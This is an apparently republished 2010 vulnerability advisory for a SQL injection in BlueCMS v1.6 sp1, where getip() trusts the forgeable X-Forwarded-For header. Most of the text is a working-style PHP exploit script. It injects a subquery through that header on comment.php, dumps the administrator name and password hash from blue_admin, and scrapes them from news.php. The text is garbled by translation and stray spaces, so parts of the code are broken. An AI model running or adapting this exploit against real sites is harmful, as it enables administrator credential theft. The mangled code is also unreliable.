BlueCMS v1. 6 sp1 $_SERVER injection vulnerability-vulnerability warning-the black bar safety net

2010-09-14T00:00:00
ID MYHACK58:62201027861
Type myhack58
Reporter 佚名
Modified 2010-09-14T00:00:00

Description

Affected version:

v1. 6 sp1

Vulnerability description:

BlueCMS is a place to classified information portal dedicated CMS system. Procedures in using the getip()function to get the Client ip when not strictly filter the data, resulting in sql injection vulnerability.

//comment.php

$sql = "INSERT INTO ". table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check)VALUES (", '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '". getip()."', '$is_check')"; // note getip() $db->query($sql);

Then take a look at this function //include/common.fun.php

function getip() { if (getenv('HTTP_CLIENT_IP')) { $ip = getenv('HTTP_CLIENT_IP'); //can be forged } elseif (getenv('HTTP_X_FORWARDED_FOR')) { $ip = getenv('HTTP_X_FORWARDED_FOR'); //can be forged } elseif (getenv('HTTP_X_FORWARDED')) { $ip = getenv('HTTP_X_FORWARDED'); } elseif (getenv('HTTP_FORWARDED_FOR')) { $ip = getenv('HTTP_FORWARDED_FOR'); } elseif (getenv('HTTP_FORWARDED')) { $ip = getenv('HTTP_FORWARDED'); } else { $ip = $_SERVER['REMOTE_ADDR']; } return $ip; }

Vulnerability is relatively simple,$_SERVER old problem.

<*reference

> http://hi.baidu.com/cnryan/blog/item/837d4551f8069c818d54300a.html

*>

Test method:

[www.sebug.net] This site provides program(method)may carry offensive,for security research and teaching purposes,at your own risk!

<? php print_r(' +---------------------------------------------------------------------------+ BlueCMS v1. 6 sp1 Getip() Remote SQL Injection Exploit by cnryan Mail: cnryan2008[at]gmail[dot]com Blog: http://hi.baidu.com/cnryan +---------------------------------------------------------------------------+ '); if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Example: php '.$ argv[0].' localhost /bluecms/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; send(); send2(); function send() { global $host, $path; $cmd = "mood=6&comment=test&id=1&type=1&submit=%CC%E1%BD%BB%C6%C0%C2%DB"; $getinj=" 0 0','1'),(",'1','0','1','6',(select concat('<u-',admin_name,'-u><p-',pwd,'-p>') from blue_admin),'1 2 8 1 1 8 1 9 7 3','9 9"; $data = "POST ".$ path."comment. php? act=send HTTP/1.1\r\n"; $data .= "Accept: /\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Length: ". strlen($cmd)."\ r\n"; $data .= "Connection: Close\r\n"; $data .= "X-Forwarded-For: $getinj\r\n\r\n"; $data .= $cmd;

$fp = fsockopen($host, 8 0); fputs($fp, $data);

$resp = ";

while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4);

return $resp; }

function send2() { global $host, $path; $message="GET ".$ path."news. php? id=1 HTTP/1.1\r\n"; $message.=" Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, application/xaml+xml, application/vnd. ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, /\r\n"; $message.=" Accept-Language: zh-cn\r\n"; $message.=" Accept-Encoding: gzip, deflate\r\n"; $message.=" User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; . NET CLR 2.0.50727; GreenBrowser)\r\n"; $message.=" Host: $host\r\n"; $message.=" Connection: Keep-Alive\r\n\r\n"; $fd = fsockopen($host,'8 0'); if(!$ fd) { echo '[-]No response from'.$ host; die; } fputs($fd,$message); $resp = "; while (! feof($fd)) { $resp.= fgets($fd); } fclose($fd); preg_match_all("/<u-([^<])-u>A<p-([^<])-p>/",$resp,$db); if($db[1][0]&$db[2][0]) { echo "username->".$ db[1][0]."\ r\n"; echo "password->".$ db[2][0]."\ r\n"; echo "[+]congratulation ^ ^"; }else die('[-]exploited fail >"<'); } ?>

Manufacturers patch:


The current vendor has not provided the patch or upgrade process, we recommend the use of this software users follow the manufacturer's home page to get the latest version: